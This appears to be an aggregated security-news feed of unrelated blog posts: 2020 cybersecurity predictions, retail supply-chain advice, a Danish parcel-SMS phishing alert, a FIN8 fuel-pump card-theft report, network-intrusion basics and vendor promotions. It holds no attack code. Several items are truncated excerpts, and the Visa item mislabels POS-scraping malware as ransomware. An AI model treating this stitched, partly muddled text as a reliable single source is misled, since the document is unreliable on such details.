According to Rob Norris, VP Head of Enterprise & Cyber Security EMEIA at Fujitsu: “We anticipate that 2020 will be a positive year for security, and encourage public and private sector to work together to bring more talent to the sector and raise the industry standards. As the threat landscape continues to expand with phishing and ransomware still popular, so will the security tools, leaving organisations with a variety of solutions. Next year will also be marked by a rush to create an Artificial Intelligence silver-bullet for cyber security and a move from old-fashioned password management practices to password-less technologies.”

“As cyber criminals continue to find new ways to strike, we’ll be working hard to help our customers across the world to prepare their people, processes and technology to deal with these threats. One thing to always keep in mind is that technology alone cannot stop a breach - this requires a cultural shift to educate employees across organisations about data and security governance. After all, people are always at the front line of a cyber-attack.”

What will 2020 bring with Cybersecurity?

In light of this, Rob Norris shares his “12 Days of Christmas” security predictions for the coming year.

1. A United front for Cyber Security Talent Development
The shortage of cyber security talent will only get worse in 2020 - if we allow it to.

The scarce talent pool of cyber security specialists has become a real problem with various reports estimating a global shortage of 3.5 million unfulfilled positions by 2021. New approaches to talent creation need to be considered.

The government, academia, law enforcement and businesses all have a part to play in talent identification and development and will need to work collaboratively to provide different pathways for students who may not ordinarily be suited to the traditional education route. Institutions offering new cyber security courses for technically gifted individuals are a great starting point, but more will need to be done in 2020 if the shortage is to be reduced.

2. Cloud Adoption Expands the Unknown Threat Landscape 
It will take time for organisations to understand their risk posture as the adoption of cloud services grows.

While the transition to cloud-based services will provide many operational, business and commercial benefits to organisations, there will be many CISO’s working to understand the risks to their business with new data flows, data storage and new services. Traditional networks, in particular, boundaries and control of services are typically very well understood while the velocity and momentum of cloud adoption services leaves CISO’s with unanswered questions. Valid concerns remain around container security, cloud storage, cloud sharing applications, identity theft and vulnerabilities yet to be understood, or exposed.

3. The Brexit Effect 
Brexit will have far-reaching cyber security implications for many organisations, in many countries.

The UK and European markets are suffering from uncertainty around the UK’s departure from the European Union, which will affect the adoption of cyber security services, as organisations will be reticent to spend until the impact of Brexit is fully understood.

The implications of data residency legislation, hosting, corporation tax, EU-UK security collaboration and information sharing are all questions that will need to be answered in 2020 post-Brexit. There is a long-standing collaborative relationship between the UK and its EU counterparts including European Certs and Europol and whilst the dynamics of those working relationships should continue, CISO’s and senior security personnel will be watching closely to observe the real impact.

4. SOAR Revolution 
Security Orchestration, Automation and Response (SOAR) is a real game-changer for cyber security and early adopters will see the benefits in 2020 as the threat landscape continues to expand.

Threat intelligence is a domain that has taken a while for organisations to understand in terms of terminology and real business benefits. SOAR is another domain that will take time to be understood and adopted, but the business benefits are also tangible. At a granular level, the correct adoption of SOAR will help organisations map, understand and improve their business processes. By making correct use of their technology stack and associated API’s early adopters will get faster and enhanced reporting and will improve their security posture through the reduction of the Mean Time To Respond (MTTR) to threats that could impact their reputation, operations and bottom-line.

5. Further Market Fragmentation will Frustrate CISOs 
The number of vendors in the cyber security market has been rapidly growing and that will continue in 2020, but this is leading to confusion for organisations.

The cyber security market is an increasingly saturated one, often at the frustration of CISO’s who are frequently asked to evaluate new products. Providers that can offer a combined set of cyber security services that deliver clear business outcomes will gain traction as they can offer benefits over the use of disparate security technologies such as a reduction in contract management, discount provisioned across services, single point of contacts and reduction in services and technologies to manage.

Providers that continue to acquire security technologies to enhance their stack such as Endpoint Detection and Response (EDR) or technology analytics, will be best positioned to provide the full Managed Detection and Response (MDR) services that organisations need.

6. Artificial Intelligence (AI) will need Real Security 
2020 will see a rise in the use of adversarial attacks to exploit vulnerabilities in AI systems.

There is a rush to create an AI silver-bullet for cyber security however, there is currently a lack of focus on security for AI. It is likely we will see a shift towards this research area as “adversarial” approaches to neural networks could potentially divulge partial or complete data points that the model was trained on. It is also possible to extract parts of a model leading to intellectual property theft as well as the ability to craft “adversarial” AI which can manipulate the intended model. Currently, it is hard to detect and remediate these attacks.

There will need to be more focus on explainable AI, which would allow for response and remediation on what are currently black-box models.

7. Organisations will need to Understand how to make better use of Security Tools and Controls at their Disposal 
Customers will need to take better advantage of the security measures that they already have available. 

The well-established cloud platforms already contain many integrated security features but organisations are failing to take advantage of these features, partly because they do not know about them. A greater understanding of these features will allow organisations to make smarter investment decisions and we expect to see a growing demand for advice and services that allow organisations to optimally configure and monitor those technologies to ensure they have minimal risk and exposure to threats.

Fujitsu predicted last year that securing multi-cloud environments will be key going forward and organisations continue to need to find a balance of native and third-party tools to drive the right solution for their objectives.

8. Do you WannaCry again? 
The end of support for Windows Server 2008 and Windows 7 will open the door for well-prepared attackers.

January 2020 sees the official end of support life for all variants of Windows Server 2008 and Windows 7, which share elements of the same code base. This means that both end-user devices and data center servers will be equally vulnerable to the same exploits and opens the possibility that organisations could be susceptible to attacks that cause large outages.

In 2017, Wannacry surfaced and caused some well-publicised outages including well-known organisations from across the healthcare, manufacturing, logistics and aerospace industries. Microsoft had released patches two months before and recommended using a later version of the impacted components. We also learned in 2017, via Edward Snowden, that nation-states have built up an armoury of previously undisclosed exploits. These exploits are documented to target the majority of publicly available Operating Systems and so it stands to reason that cyber criminals could have also built a war chest of tools which will surface once the end of vendor support has passed for these Operating systems.

9. Rising the Standard for Managing Identities and Access
Federated Authentication, Single Sign-On and Adaptive Multi-Factor will become standard, if not required, practices in 2020.

2020 will see organisations continuing their adoption of hybrid and multi-cloud infrastructures and a ‘cloud-first’ attitude for applications. This creates the challenge of managing the expanding bundle of associated identities and credentials across the organisation.

Identities and associated credentials are the key attack vector in a data breach - they are ‘keys to the kingdom’. Without sufficient controls, especially for those with privileged rights, it is becoming increasingly difficult for organisations to securely manage identities and mitigate the risk of a data breach. Capabilities such as Federation Authentication, Single Sign-On and Adaptive Multi-Factor address the challenge of balance between security and usability, and we see this becoming standard, if not required, practice in 2020.

10. Extortion Phishing on the Rise 
Taboo lures enhanced phishing and social engineering techniques will prey on user privacy.

We are seeing an increase in a form of phishing that would have a recipient believe their potentially embarrassing web browsing and private activity has been observed with spyware and will be made public unless a large ransom is paid.

Since their widespread emergence last year, the techniques used by these extortionists to evade filters continue to develop. Simple text-only emails from single addresses now come from ‘burnable’ single-use domains. Glyphs from the Cyrillic, Greek, Armenian and extended Latin alphabets are being used to substitute letters in the email to bypass keyword filters and Bitcoin wallets are rotated often and used to associate a recipient with a payment.

The psychological tricks used in the wording of these emails will develop and likely aid their continued success.

11. Passwords become a Thing of the Past 
We will see increasing adoption of end-to-end password-less access, especially in scenarios where Privileged Access Management (PAM) is required.

Next year we will see a move from old-fashioned password management practices to password-less technologies. The increasing number of cases where privileged credentials and passwords are required, but are painful to manage in secure and cost effective, way will drive this shift. Passwords are easy to forget and the increasing complexity requirements placed upon users increases the chances of passwords having to be written down – which is self-defeating. Biometric technologies and ephemeral certificates will provide a more secure and user-friendly way to manage credentials and ensure assets and data are kept secure.

12. Ransomware not so Random
As more organisations employ negotiators to work with threat actors, ransomware is likely to decrease next year.

In 2019, we observed a shift in the way certain ransomware ransom notes were constructed. Traditionally, ransomware notes are generic template text informing the victim that their files are encrypted and that they must pay a set amount of Bitcoin in order to have their files unencrypted.

When threat actors successfully deploy ransomware network-wide and achieve other deployment objectives, they inform their victims their files are encrypted. Crucially, however, they do not reveal the price they demand for their decryption. Instead, threat actors seek to open a dialogue with the victim to discuss a price. This change has seen organisations employ negotiators to work with threat actors on managing and, hopefully, reducing the demand and we expect this to continue in 2020.

How the Cyber Grinch Stole Christmas: Managing Retailer Supply Chain Cyber Risk

Cyber threats are always a prominent risk to businesses, especially those operating with high quantities of customer information in the retail space, with over 50% of global retailers were breached last year.  BitSight VP, Jake Olcott, has written guidance for retailers, on how to manage their supply-chain cyber risk to help prevent the 'Cyber Grinch' from not just stealing Christmas, but throughout the year, with four simple steps.

Cyber risk in retail is not a new concept. Retail is one of the most targeted industries when it comes to cyber-attacks. In fact, over 50% of global retailers were breached in the last year. Given the sensitive customer data these organizations often possess — like credit card information and personally identifiable information (PII) – it’s not surprising that attackers have been capitalizing on the industry for decades.

The Christmas shopping season can increase retailers’ cyber risk, with bad actors looking to take advantage of the massive surge of in-store and online shoppers that comes with it. What is important for retailers to keep in mind is that it’s not only their own network they have to worry about when it comes to mitigating cyber risk, but their entire supply chain ecosystem – from shipping distributors and production partners to point-of-sale technologies and beyond.

Take for example the infamous 2017 NotPetya attack that targeted large electric utilities, but actually ended up stalling operations for many retailers as a result. This nation-state attack had a snowball effect, wreaking havoc on shipping companies like FedEx and Maersk who are responsible for delivering many retail orders. FedEx operations were reduced to manual processes for pick-up, sort and delivery, and Maersk saw infections in part of its corporate network that paralyzed some systems in its container business and prevented retail customers from booking ships and receiving quotes.

For retailers, a cyber disruption in the supply chain can fundamentally disrupt operations, causing catastrophic harm to brand reputation, financial performance and regulatory repercussions – and the stakes are even higher during the make-or-break holiday sales period.

Here are some important steps they can take now to mitigate supply chain cyber risk this holiday season and beyond.
Step 1: Inventory your Supply Chain
A business today relies on an average of 89 vendors a week that have access to their network in order to perform various crucial business. As outsourcing and cloud adoption continue to rise across retail organizations, it is critical that they keep an up-to-date catalogue of every third party and service provider in the digital (or brick-and-mortar) supply chain and their network access points. These supply chain ecosystems can be massive, but previous examples have taught us that security issues impacting any individual organization can potentially disrupt the broader system.

An inventory of vendors and the systems they have access to allows security teams to keep track of all possible paths a cybercriminal may exploit and can help them better identify vulnerabilities and improve response time in the event of an incident.

Step 2: Take control of your Third-Party Accounts
Once you have a firm grasp of the supply chain, a critical focus should be to identify and manage any network accounts held by these organizations. While some suppliers may need access to complete their daily tasks, this shouldn’t mean handing them a full set of keys to the kingdom on their terms.

Retailers should ensure each vendor has an email account and credentials affiliated and managed by the retailer – not by the supplier organization and certainly not the user themselves. By taking this step, the retailer can ensure they are the first point of notification if and when an incident occurs and are in full control over the remediation process.

Step 3: Assess your Suppliers’ Security Posture
Retail security teams often conduct regular internal audits to evaluate their own security posture but fail to do so effectively when it comes to their supply chain relationships.

While a supplier’s security posture doesn’t necessarily indicate that their products and services contain security flaws, in the cyber world, where there’s smoke, there’s eventually fire. Poor security performance can be indicative of bad habits that could lead to increased vulnerability and risk exposure.

Having clear visibility into supplier security performance can help retailers quickly pinpoint security vulnerabilities and cyber incidents, while significantly speeding up communication and action to address the security concern at hand.

Step 4: Continuously Monitor for Changes
Third-party security performance assessment should not be treated as a one-and-done item on the supply chain management checklist.

The cyber threat landscape is volatile and ever-evolving, with new vulnerabilities and attack vectors cropping up virtually every day. That means retailers need solutions and strategies in place that provide a real-time, continuous and measurable pulse check of supplier security posture to ensure they are on top of potential threats before they impact the business and its customers.

Just as retailers track billions of packages and shipments in real-time to ensure there are no mistakes or bumps in the road, their vendor risk management program should be treated with the same due care.

This holiday season and beyond, it is critical that retailers invest in supply chain security management to reduce the risk of data breaches, slowdowns, and outages – and the costs and reputational damage that come along with them. After all, retailers are only as secure as their weakest third-party.

70% of Organizations Experienced Internal Data Breaches in the Last Five Years

Internal data breaches are on the rise, with 70% of security professionals reporting that it’s happened to them in the last five years.

According to a survey conducted by email security company Egress, accidental internal breaches are one of the top three concerns for IT security decision makers along with external hacks and malware.

Among the other findings in the report, fewer than than 40% (39.6%) of organizations train best cybersecurity practices and data hygiene to employees, and 26% of respondents did not use encryption when transmitting data externally. 

While e-mail applications are a leading cause of accidental breaches, file sharing services, collaboration tools, and SMS apps represent significant risks.

Respondents did indicate a new urgency with regard to compliance with privacy- and security-centric regulations such aspol the European Union’s General Data Protection Regulation and California’s pending California Consumer Privacy Act.

The post 70% of Organizations Experienced Internal Data Breaches in the Last Five Years appeared first on Adam Levin.

Mobile threat defense and intelligence are a core part of cyber defense

The modern workplace is a mobile workplace. Today’s organizations rely on mobility to increase productivity and improve the customer experience. But the proliferation of smartphones and other mobile devices has also expanded the attack surface of roughly 5 billion mobile devices in the world, many used to handle sensitive corporate data. To safeguard company assets, organizations need to augment their global cyber defense strategy with mobile threat intelligence.

When handled and analyzed properly, actionable data holds the key to enabling solid, 360-degree cybersecurity strategies and responses. However, many corporations lack effective tools to collect, analyze, and act on the massive volume of security events that arise daily across their mobile fleet. An international bank recently faced this challenge. By deploying Pradeo Security alongside Microsoft Endpoint Manager and Microsoft Defender Advanced Threat Protection (ATP), the bank was able to harness its mobile data and better protect the company.

Pradeo Security strengthens Microsoft Endpoint Manager Conditional Access policies

In 2017, the Chief Information Security Office (CISO) of an international bank recognized that the company needed to address the risk of data exposure on mobile. Cybercriminals exploit smart phones at the application, network, and OS levels, and infiltrate them through mobile applications 78 percent of the time.1 The General Data Protection Regulation (GDPR) was also scheduled to go into effect the following year. The company needed to better secure its mobile data to safeguard the company and comply with the new privacy regulations.

The company deployed Microsoft Endpoint Manager to gain visibility into the mobile devices accessing corporate resources. Microsoft Endpoint Manager is the recently announced convergence of Microsoft Intune and Configuration Manager functionality and data, plus new intelligent actions, offering seamless, unified endpoint management. Then, to ensure the protection of these corporate resources, the company deployed Pradeo Security Mobile Threat Defense, which is integrated with Microsoft.

Pradeo Security and Microsoft Endpoint Manager work together to apply conditional access policies to each mobile session. Conditional access policies allow the security team to automate access based on the circumstances. For example, if a user tries to gain access using a device that is not managed by Microsoft Endpoint Manager, the user may be forced to enroll the device. Pradeo Security enhances Microsoft Endpoint Manager’s capabilities by providing a clear security status of any mobile devices accessing corporate data, which Microsoft can evaluate for risk. If a smartphone is identified as non-compliant based on the data that Pradeo provides, conditional access policies can be applied.

For example, if the risk is high, the bank could set policies that block access. The highly granular and customizable security policies offered by Pradeo Security gave the CISO more confidence that the mobile fleet was better protected against threats specifically targeting his industry.

Get more details about Pradeo Security for Microsoft Endpoint Manager in this datasheet.

Detect and respond to advanced cyberthreats with Pradeo Security and Microsoft Defender ATP

The bank also connected Pradeo Security to Microsoft Defender ATP in order to automatically feed it with always current mobile security inputs. Microsoft Defender ATP helps enterprises prevent, detect, investigate, and respond to advanced cyberthreats. Pradeo Security enriches Microsoft Defender ATP with mobile security intelligence. Immediately, the bank was able to see information on the latest threats targeting their mobile fleet. Only a few weeks later, there was enough data in the Microsoft platform to draw trends and get a clear understanding of the company’s mobile threat environment.

Pradeo relies on a network of millions of devices (iOS and Android) across the globe to collect security events related to the most current mobile threats. Pradeo leverages machine learning mechanisms to distill and classify billions of raw and anonymous security facts into actionable mobile threat intelligence.

Today, this bank’s mobile ecosystem entirely relies on Pradeo and Microsoft, as its security team finds it to be the most cost-effective combination when it comes to mobile device management, protection, and intelligence.

About Pradeo

Pradeo is a global leader of mobile security and a member of the Microsoft Intelligent Security Association (MISA). It offers services to protect the data handled on mobile devices and applications, and tools to collect, process, and get value out of mobile security events.

Pradeo’s cutting-edge technology has been recognized as one of the most advanced mobile security technologies by Gartner, IDC, and Frost & Sullivan. It provides a reliable detection of mobile threats to prevent breaches and reinforce compliance with data privacy regulations.

For more details, contact Pradeo.

Note: Users must be entitled separately to Pradeo and Microsoft licenses as appropriate.

Learn more

To learn more about MISA, visit the MISA webpage. Also, bookmark the Security blog to keep up with our expert coverage on security matters and follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

Microsoft Endpoint Manager

Transformative management and security that meets you where you are and helps you move to the cloud.

Get started

12019 Mobile Security Report, Pradeo Lab

The post Mobile threat defense and intelligence are a core part of cyber defense appeared first on Microsoft Security.

SECURITY ALERT: New Denmark Phishing Campaign Uses Package Sending Notification as Pretext

A new phishing campaign disguised as package notification is on the rampage. Initially discovered in Denmark, the malicious venture notifies users that they are expecting a package delivery.

The phishing attempt came to light when a Denmark cell user received the following SMS:

phone screen with phishing attempt

The message reads: “We were unable to deliver your package DK-XXXXXX as it had been shipped with too little postage. Pay the shipping fee now to have your package delivered.” Right beneath the message, is a link called (domain sanitized by Heimdal Security) that presumably redirects the user to the package center.

However, right before the browser lands on the package center’s search page, it’s being routed via another domain, called (domain sanitized and blocked by Heimdal Security), before calling website.

The link takes the user to a package search page (see the picture below)

package search page

At this point, the user is required to search for the package’s number. The text above reads: “Quick and easy. Write your parcel number below. Search after shipping ID, address, postcode, etc.” Once the user writes down the parcel number flagged down in the SMS and presses the “Search” button, he will be redirected to the following screen:

screen with delivery status

The message reads: “Your package is on its way. Status: not sent from the Distribution Center – stopped in X post office, failing payment of 20 Danish crowns ($3). The package will be shipped when the fee is paid.” Motivated to pay the remaining postage fees, the user will press the “BETAL NU” (Pay now) button. Once again, the browser redirects the user to another website – (domain sanitized and blocked by Heimdal Security).

The DK appendage is just a bounce. Price Live, the root domain, which is listed under a United States IP, is not under CloudFlare’s protection and, therefore more visible in the wild. The root domain has also been sanitized and blocked by Heimdal Security.

Price Live’s payment processing page was specifically engineered to mimic a legitimate page. Notice in the picture below the credentials included to reinforce the illusion: Norton secured badge, SSL encryption certificate, PCI compliance, Verified by Visa, and MasterCard SecureCode and supported payment methods such as Visa, Visa Electron, MasterCard, Maestro.

phishing page credentials

Private info fields have also been added. To send the order through, which in this case is the additional postage fee, the user must fill in his first and last name, physical address, ZIP Code, city of residence, mobile number, and email address.

phishing page personal data fields


The mimicry is very difficult to detect at first glance. However, the message at the bottom of the page, which so conveniently is accompanied by a checked box, tells another story. The message reads:

By clicking Next, you will automatically agree to our Terms of Use. Our data policy tells you how we collect, use, and share your information. Subsequently, our cookie policy explains how we use cookies and similar technologies. is a product based on an automatic subscription of 39.99 euros and AUTOMATIC RENEWED at the end of the three-day trial period unless it expires before the beginning of the three-day trial period when it will be canceled.

In essence, the phishing campaign works like this: having received an SMS on the phone, the user clicks on the appended link to verify the status of the package. A brief search reveals that the delivery has been denied on account of insufficient postage. The user is then redirected to another website where he can post the due fee.  There are 2 foreseeable outcomes:

1) The user fills out the fields, leaves the box checked.

The data goes directly to the malicious actor who engineered the page. Twenty Danish crowns will be deducted from the bank account. Financial data will also be exposed. The user will also be subscribed to the product. At the end of the three-day trial period, 39.99 euros will be deducted from the bank account. Auto-renewal will kick in every three days, posting similar payouts. There’s no visible way of canceling the subscription.

2) The user fills out the field, unchecks the box.

Personal data gets stolen. Twenty Danish crowns will be deducted from the account. Financial info will be exposed. Enter2Gain subscription will not be possible.

Forensic Analysis of end domain

Domain forensics reveal that Price Live was created on the 10th of December 2019 in the UK, under TUCOWS, INC. Tucows Domains Inc. It has two CloudFlare name servers, both of them calling out approximately 21 million domains. IP address analysis points to Fasthosts Internet Limited as being the ISP. The subsequent IP change history reveals that there have been 10 changes on 10 unique addresses during the last 5 years. Registrar’s current status: client transfer and update have both been prohibited. Furthermore, the registrant has been listed as REDACTED FOR PRIVACY.

How to stay safe from the new Nordic phishing campaign

1. Refrain from clicking on any links enclosed in SMSs/emails

The most common phishing method is to include ‘spiked’ links inside an SMS or email. This will redirect you to a fake form. Contents are transmitted to a malicious actor instead of a legitimate data processing unit. Bear in mind that vendors will not ask you to fill in passwords, email addresses, names, or financial details via email.

2. Get in touch with your parcel shipping company

If by chance, you do come across a message informing you that your order cannot be delivered due to one reason or another, the best way of figuring out its legitimacy is to get in touch with your shipping company. Request details about the ETA, any due fees, any hang-ups. Most shipping companies enclose the courier’s cell number. Give him or her a call and inquire about the status. If your parcel’s due to arrive via the postmaster service, head to the nearest office and make inquiries. Don’t forget to bring along any paperwork or data regarding your delivery.

3. Anti-phishing protection

Against phishing attempts, an antivirus isn’t enough to ensure complete protection. Most requests are hijacked at the DNS level, something a traditional antivirus can’t pick up. Thor Foresight Home, our flagship threat prevention system, can filter out traffic at the DNS level and root out any phishing attempts. In addition, it can sever the connection to malicious command & control servers, rendering them useless.

Thor Foresight makes sure that link is safe!
Your parents and friends will click any suspicious link, so make sure they're protected.
Thor Foresight Home anti malware and ransomware protection heimdal security
Thor Foresight provides: Automatic and silent software updates Smart protection against malware Compatibility with any traditional antivirus.


Get Thor Foresight


The latest phishing campaign proves that malicious actors have resorted to twisted guerilla marketing techniques in order to maximize the damage and increase efficiency. Be on your guard, refrain from clicking on suspicious links, get confirmation from your shipping agency, and use an adequate antimalware solution.

The post SECURITY ALERT: New Denmark Phishing Campaign Uses Package Sending Notification as Pretext appeared first on Heimdal Security Blog.

Drupal Warns Web Admins to Update CMS Sites to Patch a Critical Flaw

If you haven't recently updated your Drupal-based blog or business website to the latest available versions, it's the time. Drupal development team yesterday released important security updates for its widely used open-source content management software that addresses a critical and three "moderately critical" vulnerabilities in its core system. Considering that Drupal-powered websites are

Top 5 Essential Features of Effective Cybersecurity for Web Apps

There's hardly any business nowadays that don't use computers and connect to the Internet. Companies maintain an online presence through their official websites, blogs, and social media pages. People use online services to conduct day to day activities like banking. And of course, there are many businesses that are completely based on the web like online markets, e-Commerce websites and

British Hacker Accused of Blackmailing healthcare Firms Extradited to U.S.

A British man suspected to be a member of 'The Dark Overlord,' an infamous international hacking group, has finally been extradited to the United States after being held for over two years in the United Kingdom. Nathan Francis Wyatt, 39, appeared in federal court in St. Louis, Missouri, on Wednesday to face charges related to his role in hacking healthcare and accounting companies in the U.S.

Visa Warns About Hackers Stealing Gas Pumps Credit Card Data

Payment processing company Visa reported that attackers at gas pumps intercept credit card data from point-of-sale networks, which are becoming increasingly attractive targets for such cybercrime organizations due to their lack of safe recognition software.

Visa said its Payment Fraud Disruption or PFD teams detected three separate threats targeting point-of-sale retailer or POS networks expected to be carried out by advanced cybercrime organizations in the summer of 2019. Two of the attacks targeted North American fuel dispenser merchants ‘ POS systems.

Forensic analysis of the targeted networks, according to Visa, suggested that the assaults on the fuel dispenser merchants will possibly be traced to a cybercrime group known as FIN8.

The firm indicated that since at least 2016, FIN8 has been an aggressive hacker group that often targets shopping, hotel, and hospitality merchants ‘ POS environments to steal payment account data.

Visa’s security alert said hackers first gained access to the fuel dispenser merchants ‘ POS networks by phishing emails with malicious links that enabled hackers with network access once pressed. They then conducted corporate network identification and acquired passwords and used them to acquire lateral access to the POS system. The attackers implemented POS scraping technology to capture payment card information after effectively breaching the POS networks.

The ransomware inserted into the POS networks seems to have specifically targeted the magnetic stripe cards, according to Visa. Thus, the payment cards used in the non-chip fuel pumps in the POS networks were at risk as hackers exploited the lack of security of the cards.

Cybercrimes, though, did not seem to concern the more stable fuel pump chip-and-pin tickets.

Visa announced earlier this year that by October 2020, gas dispenser retailers will have to install chip-and-pin readers. Any responsibility for card fraud found would be passed to the service stations after that.

The post Visa Warns About Hackers Stealing Gas Pumps Credit Card Data appeared first on .

What are the different techniques of intruding networks?

Estimated reading time: 2 minutes

Network performance is the key indicator of an enterprise’s productivity and health in these connected times. It is the prerequisite of every business enterprise to maintain a smooth network workflow; however, that is easier said than done. Enterprise networks are susceptible to unauthorized activities in the form of targeted intrusions through vulnerabilities and backdoors.

When such vulnerabilities are exploited, unsolicited access to the network occurs which can have a range of unpleasant consequences for businesses. These intrusions can have harmful effects on business health such as high utilization of resources to loss of enterprise data.

Cybersecurity teams deployed by enterprises are required to proactively detect and respond to network intrusions. It is imperative that these teams have a detailed understanding of how network intrusions and other types of attacks occur so that detection and prevention systems can be set up with the same in mind.

This understanding begins with identifying the type of attack vector. Network intrusions happen through a variety of techniques some of which are –

Asymmetric Routing

In this type of method, intrusions happen via various routes to the target device. To avoid detection, the intrusive packets bypass sensors to reach their target.

Taking advantage of vulnerabilities in networks

In many cases, networks are infiltrated through existing software with attackers either taking advantage of vulnerabilities or using stolen credentials. Since most enterprises use operating systems or other software, attacks can use these vectors for infiltration.

Common Gateway Interface (CGI) scripts

Infiltrators can use the Common Gateway Interface (CGI) scripts to secure network files. CGI scripts are used in networks to support connections between servers and clients on the Web but attackers can manipulate scripts without input verification to access files not meant for the Web.

Protocol Specific Attacks

Devices using common network protocols like TCP, ARP, IP, UDP, ICMP etc. can leave backdoors open for intrusions, e.g. man-in-the-middle attacks

Network intrusions can commonly be covered up by their controllers to ensure that enterprises are unable to detect them. Attackers use various techniques such as deleting access logs, encrypting stolen data or installing rootkits to ensure cybersecurity teams are unable to detect their activities.

The most effective way for enterprises to prevent and act against network intrusions is to employ an Intrusion Prevention/Detection System. An Intrusion Detection System (IDS) monitors all incoming and outgoing network activity and identifies any signs of intrusion in systems that could jeopardize the business. An Intrusion Prevention System (IPS) is a step ahead of IDS with its capabilities. The system detects and blocks anomalies on a company’s network. An IPS is an active control mechanism that monitors the network traffic flow. It identifies and averts vulnerability exploits in the form of malicious inputs that intruders use to interrupt and gain control of an application or system

Benefits of Seqrite’s UTM solution

Seqrite’s Unified Threat Management (UTM) offers a one-stop solution for all enterprise security needs which includes intrusion detection and prevention as a standard feature.

UTM’s in-built IDS and IPS components keep enterprises safe by:

  • Monitoring, evaluating and catching threats in real-time
  • Preventing Denial of Service (DoS)/Distributed Denial of Service (DDoS) attacks
  • Preventing the discovery of open ports by attackers

Seqrite UTM’s IPS acts as a security barrier against unwanted intrusions into enterprise networks and forestalls a broad range of DoS and DDoS attacks before they penetrate the network.

The post What are the different techniques of intruding networks? appeared first on Seqrite Blog.

‘Twas the Week Before Hackmas

Dakota Nelson // ‘Twas the week before HackmasAnd all through their housesNot a tester was workingNor moving their mouses The findings were listed in reports with careIn hopes that bugfixes would soon be thereThe hackers were nestled all snug in their chairsWhile bitstreams of 0day flowed through twisted pairs And Heather on her treadmill desk, […]

The post ‘Twas the Week Before Hackmas appeared first on Black Hills Information Security.

4 Reasons You Need Native Linux Virus Scanning

In today’s connected environments, Linux IT professionals can no longer claim that viruses are only a Windows threat.

The biggest excuse people make for forgoing virus protection is that they scan their client PCs and therefore no virus would make it to the server. However, effective malware defense requires multiple layers. This brings us to the importance of native virus scanning.

The following infographic highlights the four main reasons security experts give for using antivirus software that runs natively on your Linux system.

1. PC-Based Virus Scanning Creates Security Concerns

Scanning a Linux server from a PC creates security vulnerabilities. The process requires leaving a work station to be logged on throughout the scanning process, which compromises the security and integrity of the server, and leaves it visible to a virus or malicious code.

Native virus scanning doesn’t require a work station or a file share. 

2. PC Scanning Isn’t Very Reliable

Some parts of Linux servers are impossible for a PC-based anti-virus solution to scan and can cause non-native scans to fail, making for an incomplete and time-consuming process.

Native anti-virus solutions can automatically remove all detected threats with no additional hardware.

3. Native Antivirus Scanning Eliminates Stability Problems

A number of problems with PC-based scanning solutions, such as a lost connection to the server or a pop-up warning message, cause the scanning process to stop entirely.

Stability concerns simply aren’t an issue with native software.

4. Virus Scanning from a PC Creates Performance Problems

PC-based scanning is incredibly slow and increases the network load dramatically.

A native scanning program performs much faster, doesn’t increase the network load, doesn’t reset a file’s “last access time,” and allows for more frequent scanning.

Most organizations are running some versions of Linux, making it a prime target for malicious attackers to exploit. Additionally, Linux systems can also serve as hosts to Windows viruses. Native antivirus software provides server-level virus protection that detects and removes native Linux viruses, infected files, and Windows malware lurking on your Linux servers.

Take these threats seriously with a solution that offers battle-tested technology, advanced heuristic analysis, and detection, quarantine and cleaning. Powertech Antivirus offers the power and protection of the industry leading scan engines while supporting the specific features of your operating system.

Vulnerability Management
Big text: 
Resource type: 
Ready to take the next step?

To see exactly what a native antivirus program could do for your organization, sign up now for a free trial of Powertech Antivirus.

Cybersecurity Predictions for 2020: What Our Experts Have to Say

Reading Time: ~ 3 min.

As the year draws to a close, the cybersecurity analysts at Webroot and Carbonite pull out their crystal balls to make their predictions for the year ahead. 

Our experts predict many of the trends they’ve been tracking throughout the year—well-researched attacks, RDP compromise, and the importance of user education—will continue into the New Year. But they’ll be affected by new industry developments such as impending privacy regulations, AI-enabled attacks, and attacks targeting developing nations. 

Highly Targeted Ransomware Will Continue to Devastate Businesses

Unsurprisingly, our experts predict the strong trend toward highly targeted ransomware will bleed into 2020.  

“Highly targeted ransomware will likely continue,” predicts Webroot Software Management Manager Eric Klonowski. “Next year, we predict ransom-motivated attackers will more pointedly observe automatic backup solutions and make attempts to remove and alter the backup data or the task itself.” Klonowski said. 

High-effort, low-volume surveillance techniques are now favored by ransomware operators like the Bitpaymer Group, which has been known to customize ransomware only hours before deploying an attack, first tailoring it to observations gathered on their targets. 

We should expect actors like these to continue to gain access to networks from where they can observe financial transactions and valuable information before determining the most profitable way to strike at their intended targets. 

Phishing will likely also become more targeted as data collected from breaches is incorporated into phishing emails. Things like passwords and recent transactions can go a long way in convincing people an email is legit.—Grayson Milbourne, Security Intelligence Director, Webroot

Long-Awaited Privacy Legislation Will Finally Arrive in the U.S. 

We expect that privacy and security will continue to jockey for primacy of concern in the minds of U.S. citizens. California, which has long led the fight for more stringent data privacy for consumers, is set to enact a law in early 2020 that has often drawn comparisons to Europe’s GDPR. 

As noted by Tech Crunch, California’s new data privacy act, like GDPR, will extend to all organizations that do business with Californians, effectively making it the law of the land nationwide. But Webroot Product Marketing Director George Anderson predicts a groundswell of support among U.S. citizens for stricter data privacy regulations. 

“U.S. citizens will step up their demands for privacy in 2020,” he says. “Privacy legislation in the U.S., which has lagged behind other nations, will be a central issue.” 

But rather than settling for a new set of standards, Anderson wouldn’t be surprised if entirely new revenue models are explored. Models that rely less on selling personal data than, say, subscription fees or some other alternative. 

“I would expect an alternative paid for services that don’t abuse data will emerge, Anderson says. “The existing, untrusted purveyors of convenience will try to pivot, but ultimately lose out heavily. Legislation and technology are starting to converge due to so many abuses of privacy.”

“Adversarial attacks against AI-based security products will likely grow in scope and complexity, which would highlight the fact that  there are fundamentally two types of AI in cybersecurity: AI which acts like a smarter conventional signature and AI which is built into every facet of an intelligent, cloud-based platform capable of cross-referencing and defending itself against adversarial attacks.” —Joe Jaroch, Senior Director of Cybersecurity Strategy, Webroot

Small and Medium-Sized Businesses will Bear the Brunt of Cyberattacks

Findings regarding cybersecurity readiness among small and medium-sized businesses (SMBs) continue to be grim. Despite commonly falling victim to data breaches and other attacks, an attitude still pervades that they are either too small to catch the eye of cybercriminals or that their data isn’t valuable enough to warrant an attack. 

In a study conducted by Webroot and 451 Research, 71 percent of SMBs admitted to experiencing a breach or attack within the previous 24 months that resulted in “operational disruption, reputational damage, significant financial losses or regulatory penalties.”

According to Webroot Security Analyst Tyler Moffitt, that trend is unlikely to abate. 

